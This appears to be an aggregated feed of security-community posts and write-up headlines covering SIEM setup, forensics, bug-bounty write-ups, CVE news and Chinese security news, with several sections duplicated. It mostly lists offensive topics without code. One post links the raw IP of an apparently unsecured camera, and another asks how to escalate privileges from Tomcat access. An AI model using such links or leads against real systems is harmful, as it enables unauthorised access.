    So I just set up a new OSSIM instance from scratch. I've added my API key (and have subsequently regenerated new ones for troubleshooting). I'm not sure how long I have to wait for the OTX subscriptions to sync and download to the OSSIM client, but when I click the dropdown on the OTX page in OSSIM, and click on View Account Details, it takes me to the otx.alienvault.com webpage, and shows that I'm not following or subscribed to any pulses.. However, if I log into OTX with the same account, it shows that I am subscribed to several. I've ran the 'curl' command to test the OTX-API key and it worked without error. I've also noticed that another alarm I am receiving is "no information available. you are no longer subscribed to this pulse" but there is no information as to what pulse they're referring to. And googling it found an Alienvault KB that said it was fixed in 5.4. I'm on 5.8 (the latest version, up to date as well). ​ Anyone else having this issue with Alienvault OSSIM and OTX not syncing? If there's a command to force sync (I've done the option in the console for updating the threat feeds), that would be appreciated. submitted by /u/Phyxiis [link] [comments]  ( 1 min )
    Building a forensics lab - what are must haves? Any templates?
    We have some spare resources and we're looking to build a dedicated forensics, analysis lab. We have a couple poweredges we can use. The current plan is a segregated environment to clone suspect machines and see how they interact and do whatever analysis is required. I don't really know where to start expect segregating it or having a faux network connection. It seems a lot of people just run labs locally, however we're required to essentially have thin clients. What have your team built for this? Any must have tools? submitted by /u/idnUygelps [link] [comments]  ( 3 min )
    What are the Open Source Tools Network Scanning Tools?
    We are a medium size healthcare medical center, maybe 300 nodes. What are the available open source /free tools I can use to achieve this use case ? Scanner that will say “2 new systems in this". Results should give me the OS version and check if antivirus is installed. submitted by /u/techno_it [link] [comments]  ( 1 min )
    Using Tomcat Virtual Host Manager
    I found access to Tomcat Virtual Host Manager on Tomcat 9 (not the one that deploys WAR files) which according to docs means the account has the role "admin-gui". I've been asked if I can pivot further using this but I'm completely stuck because I've never used it. All I can use is a form which can "Add Virtual Host" but from my testing (and limited experience with Tomcat) I've run into a halt. Anyone know if this can be used to privesc? submitted by /u/plutofoxtrot [link] [comments]  ( 1 min )
    LastPass free account with yubikey?
    Lastpass free account by default doesn't support Yubikey. But lastpass support Google auth. In theory, they are all compatible because of the same protocol. Can I just set select "Google Auth." then go ahead and use my Yubico auth. app? Thanks. Anyone has experience? submitted by /u/mk_life [link] [comments]  ( 1 min )
  • Open

    Check Out The Full Speaker Line-Up of IWCON 2022
    Book your seats for the coolest, most value-packed cybersecurity event of 2022!  ( 2 min )
    Intigriti’s February XSS Challenge Walkthrough
    Today, I will be sharing about my solution on Intigriti’s February XSS Challenge 0222  ( 4 min )
    TryHackMe: Gallery
    Walkthrough  ( 3 min )
    Phishing Emails and Malware Traffic Analysis
    In this article, I use NetworkMiner, Wireshark and Hybrid-Analysis to analyze several malicious emails and a PCAP file that captured…  ( 11 min )
    Security Awareness — TryHackme
    You will understand what is security awareness and the importance of it  ( 2 min )
    Day 23 Cross-Site Scripting - Part 2#100DaysofHacking
    Get all the writeups from Day 1 to 21, Click Here Or Click Here.  ( 2 min )
    Hacking AWS Cognito Misconfiguration to Zero Click Account Takeover
    Hi all, hope you are keeping well and staying safe. This blog is about my recent Account Takeover finding. Continue reading on InfoSec Write-ups »  ( 4 min )
    Cyborg | TryHackMe Walkthrough
    Hack the backup file  ( 3 min )
    [Day 8] Special by John Hammond Santa’s Bag of Toys | Advent of Cyber 3 (2021)
    We will be learn about a little bit of Forensics Analysis in Windows.  ( 5 min )
    Install Invisible Malicious Apps Remotely, Acting As Updates
    Use Flickr app to install malicious apps remotely acting as updates. Continue reading on InfoSec Write-ups »  ( 3 min )
  • Open

    Check Out The Full Speaker Line-Up of IWCON 2022
    Book your seats for the coolest, most value-packed cybersecurity event of 2022!  ( 3 min )
    Intigriti’s February XSS Challenge Walkthrough
    Today, I will be sharing about my solution on Intigriti’s February XSS Challenge 0222  ( 4 min )
    TryHackMe: Gallery
    Walkthrough  ( 3 min )
    Phishing Emails and Malware Traffic Analysis
    In this article, I use NetworkMiner, Wireshark and Hybrid-Analysis to analyze several malicious emails and a PCAP file that captured…  ( 11 min )
    Security Awareness — TryHackme
    You will understand what is security awareness and the importance of it  ( 2 min )
    Day 23 Cross-Site Scripting - Part 2#100DaysofHacking
    Get all the writeups from Day 1 to 21, Click Here Or Click Here.  ( 2 min )
    Hacking AWS Cognito Misconfiguration to Zero Click Account Takeover
    Hi all, hope you are keeping well and staying safe. This blog is about my recent Account Takeover finding. Continue reading on InfoSec Write-ups »  ( 4 min )
    Cyborg | TryHackMe Walkthrough
    Hack the backup file  ( 3 min )
    [Day 8] Special by John Hammond Santa’s Bag of Toys | Advent of Cyber 3 (2021)
    We will be learn about a little bit of Forensics Analysis in Windows.  ( 5 min )
    Install Invisible Malicious Apps Remotely, Acting As Updates
    Use Flickr app to install malicious apps remotely acting as updates. Continue reading on InfoSec Write-ups »  ( 3 min )
  • Open

    Dropping Files on a Domain Controller Using CVE-2021-43893
    submitted by /u/dmchell [link] [comments]
    cube0x0/KrbRelay: Framework for Kerberos relaying
    submitted by /u/dmchell [link] [comments]
    Persistence – Notepad++ Plugins
    submitted by /u/netbiosX [link] [comments]
    Install Invisible Malicious Apps Remotely, Acting As Updates
    submitted by /u/banginpadr [link] [comments]
    How I Hacked A Reputed Hacker
    submitted by /u/banginpadr [link] [comments]
  • Open

    Preventing, Detecting, & Hunting for Exploitation of the Log4j 2 Vulnerability
    Article URL: https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/ Comments URL: https://news.ycombinator.com/item?id=30335183 Points: 2 # Comments: 0  ( 28 min )
  • Open

    aimbot idea?
    I was thinking that what if there was a type of screen reader or something like that that detected enemy characters in a video game and locked your mouse to it? is that even possible? just an idea I don't know the technicalities submitted by /u/mr_killlerrrrr [link] [comments]  ( 1 min )
  • Open

    Netsparker Enterprise achieves WCAG 2.1 accessibility compliance
    Invicti is proud to break down barriers of access in software. Learn more about how we’ve achieved WCAG 2.1 AA compliance for accessibility standards. READ MORE  ( 3 min )
  • Open

    Dropping Files on a Domain Controller Using CVE-2021-43893
    Article URL: https://www.rapid7.com/blog/post/2022/02/14/dropping-files-on-a-domain-controller-using-cve-2021-43893/ Comments URL: https://news.ycombinator.com/item?id=30333641 Points: 2 # Comments: 0  ( 14 min )
    CVE-2021-23567
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2021-23567 Comments URL: https://news.ycombinator.com/item?id=30328625 Points: 4 # Comments: 4  ( 4 min )
  • Open

    SecWiki News 2022-02-14 Review
    SecWiki周刊(第415期) by ourren Java安全研究与安全开发面试题总结 by ourren 记一次挖矿病毒的应急响应 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    What are The Red Team and Blue Team in Cyber Security?
    The red team comprises offensive security experts that attempt to attack the cybersecurity defenses of an organization. On the other hand… Continue reading on Medium »  ( 1 min )
  • Open

    Small Business DFIR Services
    Hey all, I wanted to discuss something with this community. Recently I got an ask to recommendation DFIR services for a small business (<50 employees) after they were hacked. I started thinking and realized their was not any business I knew of to help small businesses. ​ First, if anyone knows of a US-based company for DFIR services I would appreciate a suggestion. ​ Second, I do not believe there is any low-cost DFIR company that is meant for small (or medium-sized) business. So, what do you think it would take for these large consulting firms- or even a government service to provide accessible services to any small business that doesn't have the capital to hire the larger cybersecurity or consulting firms? I.e. Create a special LICENSE on open source projects, organize a non for-profit with rotating analysts, pro-bono cyber, etc. submitted by /u/Jklm264 [link] [comments]  ( 7 min )
  • Open

    Persistence – Notepad++ Plugins
    It is not uncommon a windows environment especially dedicated servers which are managed by developers or IT staff to have installed the Notepad++ text editor.… Continue reading → Persistence – Notepad++ Plugins  ( 5 min )
    Persistence – Notepad++ Plugins
    It is not uncommon a windows environment especially dedicated servers which are managed by developers or IT staff to have installed the Notepad++ text editor.… Continue reading → Persistence – Notepad++ Plugins  ( 5 min )
  • Open

    BotenaGo 僵尸网络源码泄露,攻击者武器库又增加
    2021 年 11 月,AT&T Alien Labs 首次披露 Golang 编写的恶意软件 BotenaGo。最近,该恶意软件的源代码被上传到 GitHub 上,这可能会催生更多的恶意软件变种。  ( 1 min )
    FritzFrog 疯狂扩张,近四成受害者在中国
    FritzFrog 主要通过 SSH 爆破进行传播,爆破成功后部署恶意软件。研究人员发现,FritzFrog 大约 37% 的失陷主机位于中国。  ( 1 min )
    FreeBuf早报 | 修订后的《网络安全审查办法》今日施行;知乎称未使用行为感知系统监测员工
    知乎表示,对于违规收集个人信息安全的行为,本身严重背离知乎价值观,对这类系统我们一向持坚决反对态度。  ( 1 min )
    超6.02亿美元!2021年勒索软件获得赎金创新高
    调查显示,2021年全球范围内勒索软件威胁正持续增加。全球的组织、机构在过去一年共支付了超6亿美元的加密货币。
    一份解密的文件披露,中央情报局正秘密搜集美国本土公民信息
    根据2月10日解密的一份文件,美国中央情报局在未经国会允许的情况下,一直秘密地搜集美国本土公民数据。  ( 1 min )
    Apple 修复了新的“零日”漏洞
    苹果公司已经成功修复一个新的WebKit零日漏洞。  ( 1 min )
    2021年全球一半的电子邮件是垃圾邮件
    根据卡巴斯基的最新报告,去年超过一半的邮件是垃圾邮件  ( 1 min )
    喜茶安全部门全部被裁,元芳你怎么看?
    安全部门是如此不受重视,当企业经营出现问题时,几乎是第一个被裁掉,以此降低企业经营成本。  ( 1 min )
    如何做好安全研发人才招聘之团队模型的建立
    网络安全科技企业,最宝贵的就是人才。一般来说,企业70%左右的成本都是人力成本,没有合适的人,一切远大的科技理想都是镜中花  ( 1 min )
  • Open

    grave headstones
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Cams at an Asian hog farm
    http://27.156.152.250:8889/ If you're lucky you'll see the grumpy old farmer. Warning, possibly some dead animals and cruelty. -edit submitted by /u/inoculatemedia [link] [comments]

  • Open

    Intigriti XSS Challenge 0222 — Write-Up
    XSS challenge by intigriti Solved by Th3Mind Continue reading on Medium »  ( 3 min )
    Intigriti’s February XSS Challenge Walkthrough
    Today, I will be sharing about my solution on Intigriti’s February XSS Challenge 0222 Continue reading on InfoSec Write-ups »
    #Bug Bounty - How I was able to purchased premium feature just for “1” PKR by (Parameter…
    Price Manipulation Continue reading on Medium »  ( 1 min )
    100 Days of Hacking — DAY 9
    Objectives of day 9 : Continue reading on Medium »  ( 1 min )
    Install LinkFinder on Kali Linux
    LinkFinder : a tool written in python that finds the endpoints from/in JavaScript files. Continue reading on Medium »  ( 1 min )
    How to Setup/Configure Burpsuite with Firefox
    Hello all i am back with another blog on bug bounty we will see how we can setup/configure burpsuite with firefox to intercept all… Continue reading on Medium »  ( 1 min )
    Exploiting CVE-2019–5418- File Content Disclosure on Rails
    In Action View <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1, and v3, a File Content Disclosure vulnerability exists where properly designed… Continue reading on Medium »  ( 1 min )
    Broken Link Hijacking - Mr. User-Agent
    Summary : Continue reading on Medium »  ( 3 min )
    Bug Bounty Stress aka Burnout: do and don’t
    Don’t stress yourself too much Continue reading on Medium »  ( 3 min )
  • Open

    How do Secrets Managers help?
    Nearly everyone seems to say that the best way to store secrets in a cloud environment is to put them in a secrets manager and only fetch them when needed. This has the advantage of allowing seamless key rotation, adding IAM policies, etc. Does this actually increase the security posture of the app though? The app still needs to authenticate with a key manager somehow - I would guess by way of an API token or similar. If the app or the box serving the app get owned, doesn't this basically compromise all the secrets in the secret manager accessible to the app? Also, assuming my previous statement is correct, there must be a "bootstrapping secret" which is injected to the app that lets it talk to the secrets manager. How does the app get access to that secret? I don't mean in a specific cloud (e.g. Azure, GCP, AWS) - just in general, how does whoever is providing the secret know to trust the app? submitted by /u/parallelocat [link] [comments]  ( 1 min )
    How do I use Kape to capture a memory image and upload it to S3?
    I'm in the FOR508 class right now, playing around with around with Kape. I was able to get it to run the !SANS_Triage target and upload the results to an S3 bucket. This will be amazing for doing IR on remote computers, what an awesome tool! I'm also able to get Kape to create a memory image using the DumpIt_Memory module but so far I haven't been able to get it to send a memory image to S3. Is that possible? Here's a sample for how I got the !SANS_Triage target to send to S3: .\kape.exe --tsource C: --tdest D:\kape\acquired\SANS_Triage_%d%m --tflush --target !SANS_Triage --vss --vhdx S3_SANS_Triage_ --s3r us-east-1 --s3b bucket123 --s3k THISISMYACCESSKEYID --s3s ThIsIsMaHsUpErSeCrEtAcCeSsKey123456789+++ --s3st hQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9X Is this the way? From what I can tell the only way to generate a temporary AWS logon was using the CLI. Create a new user that only has put/write access to the S3 bucket you want to use then run: PS C:\Program Files\Amazon\AWSCLIV2> aws sts get-session-token --duration-seconds 129600 submitted by /u/mnbitcoin [link] [comments]  ( 1 min )
    Given that smart light bulbs can be 'hidden' in plain sight, and most of them are reflashable - how long will it be until the first one is used to gain a foothold inside a target network?
    I was actually looking for something to use as a PWNplug, but even those stand out a bit, whereas wifi light bulbs are ... just light bulbs, with wifi, and a devkit. https://hackaday.com/2020/02/11/custom-firmware-for-cheap-smart-bulbs-is-a-cinch-to-tinker-with/ Most of them seem to be based on the same Expressif chipset https://github.com/ct-Open-Source/tuya-convert https://github.com/arendst/Tasmota This was more of a rhetorical question, but I thought it might interest some of you. submitted by /u/boli99 [link] [comments]  ( 3 min )
    Career in Bug Bounty?
    I read an article about a pen tester making 300k off a bug bounty. My question is can someone live off this? Can anyone do this with the right knowledge and training? Do you have to be some sort of genius? submitted by /u/Bugskee [link] [comments]  ( 3 min )
  • Open

    Resource/Reference for Crypto mining Artifacts?
    Looking for a good resource (web page, poster, graphic etc.) for locating artifacts that indicate the use of a crypto miner on a computer. Does anyone know of anything? submitted by /u/admincee [link] [comments]  ( 1 min )
    Magnet Web Page Saver
    Has anyone here had working experience with the free tool Web Page Saver? I am looking into using it at my lab and have some serious questions about how it work and when/what cases it should be used with. Any guidance is appreciated submitted by /u/trex4n6 [link] [comments]  ( 1 min )
    Bulk Extractor Review
    Howdy all! Newbie alert! So I currently started using Bulk_Extractor with Volatility tor Memory Forensics! My real question is how reliable are the results obtained from Bulk Extractor? I see a lot of explicit websites in my Bulk Extractor Domain Histogram results! But can’t be able to find them in Volatility! Any idea of how this works? submitted by /u/GloryHunter9 [link] [comments]  ( 1 min )
    How do I use Kape to capture a memory image and upload it to S3?
    I'm in the FOR508 class right now, playing around with around with Kape. I was able to get it to run the !SANS_Triage target and upload the results to an S3 bucket. This will be amazing for doing IR on remote computers, what an awesome tool! I'm also able to get Kape to create a memory image using the DumpIt_Memory module but so far I haven't been able to get it to send a memory image to S3. Is that possible? Here's a sample for how I got the !SANS_Triage target .\kape.exe --tsource C: --tdest D:\kape\acquired\SANS_Triage_%d%m --tflush --target !SANS_Triage --vss --vhdx S3_SANS_Triage_ --s3r us-east-1 --s3b bucket123 --s3k THISISMYACCESSKEYID --s3s ThIsIsMaHsUpErSeCrEtAcCeSsKey123456789+++ --s3st hQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9XhQvTyXZmzJgui$c6@KB$ASiQAkRt!BTcMiB%38@XeD&agxzk9#ihiBiqaPKj%gok*iwJeAtRKgapqp8rJ!LFLCAivNmgqu*iBQHg!j&i55eByWxQnqJUcWiAF8YBhe9X ​ From what I can tell the only way to generate a temporary AWS logon was using the CLI. Create a new user that only has put/write access to the S3 bucket you want to use then run: PS C:\Program Files\Amazon\AWSCLIV2> aws sts get-session-token --duration-seconds 129600 submitted by /u/mnbitcoin [link] [comments]  ( 1 min )
  • Open

    Ask HN: Vulnerability Research in 2032?
    Hi HN, I've always been curious about bug hunting. Finding vulns. I have some foundational knowledge like fuzzing, basic web security and reading assembly, but I am also aware of all the improvements in software and web security and there are so many new tech stacks, languages and platforms these days. Where does one begin? Is it worth learning how to find memory safety vulns given how C and friends are dying (and when they are alive things like CFG and appguard make it impossible to exploit them)? Are there any modern books or sites you recommend? Should I be leaning some language (rust/go?) or stack (k8s?) as a prerequisite? Comments URL: https://news.ycombinator.com/item?id=30324988 Points: 1 # Comments: 0  ( 1 min )
    Apple emits emergency fix for exploited-in-the-wild WebKit vulnerability
    Article URL: https://www.theregister.com/2022/02/11/apple_emergency_webkit/ Comments URL: https://news.ycombinator.com/item?id=30324643 Points: 4 # Comments: 3  ( 9 min )
  • Open

    SysWhispers Shellcode Loader w/ ETW patching, anti-sandboxing, and 6 execution options
    submitted by /u/ChadMotivation [link] [comments]
  • Open

    What is a Skip Tracer?
    Skip tracing is the process of tracking down people who are particularly hard to find, whether they’re persons-of-interest, fact witnesses… Continue reading on Medium »
    Creating a Honeypot
    First it’s important to describe what a honeypot is and why it’s a good idea to create on. In the cyber security field a honeypot is… Continue reading on Medium »  ( 9 min )
  • Open

    SecWiki News 2022-02-13 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Mostly big boobs photos (NSFW)
    submitted by /u/Boobalizer [link] [comments]
  • Open

    CTF中PHP相关题目考点总结(下)
    本文主要总结了我在写ctfshow题目中遇到的关于PHP的考点。因为只总结知识点和考点会比较空洞,也不容易理解,所以我都是通过题目来总结考点,这样的话比较容易理解。  ( 2 min )
    CTF中PHP相关题目考点总结(上)
    本文总结了ctfshow题目中遇到的关于PHP的考点。  ( 2 min )
  • Open

    Widespread CSRF on authenticated POST endpoints
    UPchieve disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1309435
  • Open

    CVE-2021-45464 – LKVM Escape
    Article URL: https://www.kalmarunionen.dk/writeups/2021/hxp-2021/lkvm/ Comments URL: https://news.ycombinator.com/item?id=30320463 Points: 4 # Comments: 0  ( 11 min )
    The long road to a fix for CVE-2021-20316
    Article URL: https://lwn.net/SubscriberLink/884052/c946bb7f8d39c54e/ Comments URL: https://news.ycombinator.com/item?id=30319122 Points: 8 # Comments: 0  ( 16 min )

  • Open

    Biohazard- Tryhackme CTF
    This is a write-up about the Biohazard CTF room from Tryhackme (a free cybersecurity training site that provides machines for you to… Continue reading on Medium »  ( 8 min )
    Exploit SUID misconfiguration for privilege escalation
    In this article, I am going to explain what are SUID binaries how to exploit them for getting root shell i.e privilege escalation on the… Continue reading on Medium »  ( 2 min )
  • Open

    [h1-2102] Break permissions waterfall
    Shopify disclosed a bug submitted by hogarth45: https://hackerone.com/reports/1088159 - Bounty: $500
    Blind XSS on Twitter's internal Jira panel at allows exfiltration of hackers reports and other sensitive data
    Twitter disclosed a bug submitted by iambouali: https://hackerone.com/reports/1369674 - Bounty: $5040
  • Open

    My Pentest Log -6-
    Greetings Everyone from Hippodrome (Constantinople), Continue reading on Medium »  ( 2 min )
    100 Days of Hacking — Day 8
    Objectives of day 7 : Continue reading on Medium »  ( 1 min )
    Basic Web Technologies Knowledge required for starting with the web Exploitation Part-3
    Hello Hackers hope so You are doing well. I myself Manan Aggarwal a Btech Student is Here to Present you the blog in the continuation of… Continue reading on Medium »  ( 6 min )
    A tale of 0-Click Account Takeover and 2FA Bypass.
    Hey, it’s been a long time since I published a bug bounty write-up. I was in an internship period. So, I had a lot of free time. Anyways… Continue reading on Medium »  ( 2 min )
    Hacking My ISP For FREE Internet
    Note: This article is only for educational purpose. Continue reading on Medium »  ( 2 min )
    PORTSWIGGER WEB SECURITY - BROKEN ACCESS CONTROL LAB ÇÖZÜMLERİ
    Access Control (Erişim Kontrolü) veya Authorization (Yetkilendirme), talep edilen eylemlere veya erişim kaynaklarına, kimin veya neyin… Continue reading on Medium »  ( 10 min )
    HOW I GOT THE BOUNTY OF $280+ in just a matter of seconds…
    Hey folks, Continue reading on Medium »  ( 2 min )
    Improving the impact of a mouse-related XSS with styling and CSS-gadgets
    I will write more about how I make PoCs in the future. But with special care, I work out scenarios for vulnerabilities that need user… Continue reading on Medium »  ( 2 min )
    Attack Surface Monitoring using Open-Source Intelligence
    The paper introduces the case study for attack surface analysis and monitoring with practical application of open-source intelligence… Continue reading on Medium »  ( 7 min )
    Bug Bounty: My First Five Figure Payout
    This is the post from my Telegram channel about Bug Bounty, where I share my experience and knowledge as well as just write about being… Continue reading on Medium »  ( 2 min )
  • Open

    SecWiki News 2022-02-12 Review
    开源软件包与软件供应链安全漏洞修复分析研究 by ourren 攻防对抗的十八层地狱 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    OSINT Automation Tool — Spiderfoot
    Spiderfoot Continue reading on Medium »  ( 1 min )
    Valerie vs Valoree
    Yes, this is really happening.  No, I’m not running to cause ballot confusion. Continue reading on Medium »  ( 1 min )
    How To Find Timestamps For Verification
    Finding exact timestamps in web material is a must-have ability for OSINT and verification researchers, but where do you look? Continue reading on Medium »
    Attack Surface Monitoring using Open-Source Intelligence
    The paper introduces the case study for attack surface analysis and monitoring with practical application of open-source intelligence… Continue reading on Medium »  ( 7 min )
  • Open

    The Top 13 Ethical Hacking Courses on Udemy (2022)
    submitted by /u/Jan_Prince [link] [comments]
  • Open

    Technical documents for JOINT POLAR SATELLITE SYSTEM
    A little over my head but if any climate geeks want to access raw data, here's the tools. Main index directory: https://www.jpss.noaa.gov/assets/ Community Satellite Processing Package (open source direct broadcast): http://cimss.ssec.wisc.edu/cspp/ Example: https://www.jpss.noaa.gov/assets/pdfs/technical_documents/472-00340_J2_HRD_to_DBS_RF_ICD_Rev_C.pdf API references: https://www.jpss.noaa.gov/sciencedocuments/sciencedocs/2015-06/474-00019-01_JPSS-API-Users-Guide-Vol-I_0123A.pdf https://www.jpss.noaa.gov/sciencedocuments/sciencedocs/2015-06/474-00019-02_JPSS-API-Users-Guide-Vol-II_0124-.pdf submitted by /u/inoculatemedia [link] [comments]
    Audio and art programs (mostly) for Atari 2600
    http://www.qotile.net/files/ submitted by /u/inoculatemedia [link] [comments]
  • Open

    现代前后端分离式应用API渗透测试探究
    越来越多的国内互联网企业为了提高开发测试迭代速度以及前端统一的需求,搭上了前后端分离的快车。基于新的前端框架,如何更高效的进行API测试就变得越加重要。  ( 1 min )
    NodeJS堆溢出?原因是默认设限了内存上限。解除封印!
    使用NodeJS开发的应用,如果需要处理大量数据,可能导致堆溢出。错误提示中,会有“JavaScript heap out of memory”。
  • Open

    CISSP Domain 1 - Episode 5 - Security Roles and Responsibilities, Control Frameworks, Due care & Due Diligence, Policies, Standards, Procedures, Guidelines & Baseline and Threat Modeling by Get Set CISSP
    submitted by /u/Tradition_Wonderful [link] [comments]  ( 1 min )
  • Open

    How do I get my foot in the door with forensics?
    I have my masters in digital forensics but like a fool I never did anything with it. I’m a quick study and will only take me about a week or two to relearn everything. I have a security clearance and currently with in government contracting as a project manager but no company is biting. I want to finally make the switch but it’s hard when you don’t have in lab experience or the certs. Any advice on how to get restarted in this field? TIA! submitted by /u/kindreddino [link] [comments]  ( 6 min )
    Imaging Android and iOS devices
    Hello, can anyone teach me how to image these devices. Or if you can point me to some tutorials. I have been trying to learn but I keep failing. Thanks in advance. submitted by /u/Sudden_Ad9859 [link] [comments]  ( 1 min )
  • Open

    Apple fixes Mac battery drain, WebKit vulnerability in software updates
    Article URL: https://arstechnica.com/gadgets/2022/02/apple-patches-security-holes-and-bugs-with-ios-15-3-1-and-macos-12-2-1/ Comments URL: https://news.ycombinator.com/item?id=30308727 Points: 2 # Comments: 0  ( 3 min )

  • Open

    Simple tool to find client side prototype pollution vulnerability
    submitted by /u/boch33n [link] [comments]
    Pre-auth WAN remote root for Cisco RV340 VPN Gateway Router
    submitted by /u/ChoiceGrapefruit0 [link] [comments]
    Cisco ASDM: Manage at Your Own Risk
    submitted by /u/chicksdigthelongrun [link] [comments]
    WordPress < 5.8.3 - Object Injection Vulnerability
    submitted by /u/monoimpact [link] [comments]  ( 1 min )
    A simple tool to audit Linux system libraries to find public security vulnerabilities.
    submitted by /u/CoolerVoid [link] [comments]  ( 1 min )
    AD CS: from ManageCA to RCE - BlackArrow
    submitted by /u/Margaruga [link] [comments]
    Internet-Wide Study: State Of SPF, DKIM, And DMARC - RedHunt Labs
    submitted by /u/redhuntlabs [link] [comments]  ( 1 min )
  • Open

    Mellium 0.21.1 fixes CVE-2022-24968
    Article URL: https://mellium.im/cve/cve-2022-24968/ Comments URL: https://news.ycombinator.com/item?id=30308038 Points: 1 # Comments: 0  ( 1 min )
    Apple fixes actively exploited zero-day (CVE-2022-22620)
    Article URL: https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/02/update-now-apple-fixes-actively-exploited-zero-day/ Comments URL: https://news.ycombinator.com/item?id=30304109 Points: 1 # Comments: 0  ( 3 min )
  • Open

    How safe is this obscure software my friend bought on eBay?
    My friend is having technical difficulties with his iPad (he reset it and you can’t get through the welcome/setup without allowing remote access management to a certain company, which he doesn’t want to do) and he bought some software on eBay that promises to help bypass that error. His computer is old and won’t run the software when he tries to. My MacBook is brand new and so he asked me if I could download the eBay software onto my computer to try to fix the iPad. To me that doesn’t seem like something I want to download onto my new laptop. Maybe I shouldn’t have binged all of the darknet diaries podcast but idk doesn’t feel safe. Here’s what it looks like. Any thoughts? submitted by /u/aimhighswinglow [link] [comments]  ( 4 min )
    Is is safe to feed patterns to hashing functions in order to create passwords for websites?
    I had this idea on how to generate supposedly safe passwords for different websites/accounts that wouldn't require passwords to be memorized or stored. The idea is to 1 - Come up with a short default string that would never change (say, "bubly42") 2 - Append the name of the website to that string for each website you make an account. For example, when creating an account for airbnb it'd produce the string "bubly42airbnb" 3 - Run that string (bubly42airbnb) through a hash function 4 - Use the output of the hash function as the password for the website This would have the upside of not requiring memorization or storage of passwords, while still generating a unique password for each site. I can just generate the password on the fly. Obvious downside is that if someone figures your pattern out, they pretty much can figure out all of your passwords. Is there anything else that I'm missing? Is this considered safe? (Btw, sorry if I'm posting on the wrong place. If that's the case, can someone direct me to a good subreddit to post this in?) submitted by /u/djoncho [link] [comments]  ( 4 min )
    Possible malware in official Torguard windows VPN client ??
    Torguard's VPN client intermittently consumes 50% cpu, for long periods, unrelated to any network activity, which I find suspicious. Details below. I've raised this with TG's tech support who have repeatedly denied that any such behavior exists. I'm seeing this consistently on 4 windows machines (including one VM) where I have TG running. I'm not sure where to report this as there is no TG subreddit and the VPN subreddit doesn't allow mentioning specific services. Hopefully you folks can point me in the right direction or give advice. So, if the app is running and the VPN is connected, even if there are no other apps open, TG client will randomly begin consuming a constant 50% CPU. I can't correlate this with any other condition like network traffic or other app activity or any obvious thing TG is doing. If I minimize the TG client window, it stops. And then it starts again in a few minutes, and so I repeat this remedy, and it stops. If I don't do this it continues indefinitely. So, every computer this is running on experiences a significant heat/wattage increase and CPU performance degradation due to TG. I took screenshots of this behavior using task manager. I also watched it using winternals' process monitor, which gave much more detailed info than this. ---- But this forum doesn't allow pictures. submitted by /u/Dougolicious [link] [comments]  ( 2 min )
    How to get over the unrecognized app/publisher warning in Windows
    All, I am writing an executable to put on a website for download. Every time I go to download it, I get an "unrecognized app, unknown publisher warning". It's not tagged as malicious, but it's tagged as "unknown publisher" which makes it appear that way. Does anyone know how to add a publisher? Is that something a non-corporation can do? Or could I at least add a certificate or something to make Windows calm down? submitted by /u/iExtrapolate314 [link] [comments]  ( 1 min )
    How to get access on clean-mx.de
    Correct me if I am on the wrong subreddit, I have seen some people talk about this site in here, but how do you get access on clean-mx? I tried creating an account in there(registration form), but I haven't got a response back, unless I am being impatient. I also tried contacting the email, but it is dead as stated in the site. There is multiple sites to register accounts, xlogin.php, xregister.php, etc etc. I can see it's alive because when I search the site up, I see the dates from right now. ​ Is this site restricted to companies only or not? Can you not register anymore? ​ (couldnt post this in a other subreddit, my post kept getting removed because they thought it was a tech-support question) submitted by /u/RainbowIsRainbow [link] [comments]  ( 1 min )
    What are the security monitoring can accomplish these scanning and detection?
    Hi Folks, As the title says, what tools can help to achieve these objectives Real time scan the network to detect presence of unauthorized hardware, software, and firmware components within the network. To scan and detect in real- time the addition of devices into network and notify the security administrator via email. submitted by /u/techno_it [link] [comments]  ( 3 min )
    Pen test dropbox running Win OS with Kali VM - with 4G callback
